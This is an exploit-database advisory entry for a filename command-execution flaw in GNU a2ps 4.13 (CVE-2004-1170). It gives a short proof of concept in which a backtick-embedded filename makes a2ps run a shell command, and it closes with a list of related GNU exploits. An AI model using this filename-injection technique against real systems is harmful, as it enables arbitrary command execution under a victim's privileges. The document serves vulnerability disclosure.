source: http://www.securityfocus.com/bid/11025/info Reportedly GNU a2ps is affected by a filename command-execution vulnerability. This issue is due to the application's failure to properly sanitize filenames. An attacker might leverage this issue to execute arbitrary shell commands with the privileges of an unsuspecting user running the vulnerable application. Although this issue reportedly affects only a2ps version 4.13, other versions are likely affected as well. $ touch 'x`echo >&2 42`.c' $ a2ps -o /dev/null *.c 42 [x`echo >&2 42`.c (C): 0 pages on 0 sheets] [Total: 0 pages on 0 sheets] saved into the file `/dev/null'
Related ExploitsTrying to match CVEs (1): CVE-2004-1170
Trying to match OSVDBs (1): 9176
Other Possible E-DB Search Terms: GNU a2ps 4.13, GNU a
|2004-03-01||23771||GNU Anubis 3.6.x/3.9.x - Multiple Format String||Ulf Harnhammar|
|2004-03-01||23772||GNU Anubis 3.6.x/3.9.x - auth.c auth_ident() Function Overflow||CMN|
|2005-02-13||816||GNU a2ps - 'Anything to PostScript' Local Exploit (Not SUID)||lizard|
|2003-07-03||22861||GNU AN - Local Command Line Option Buffer Overflow||ace|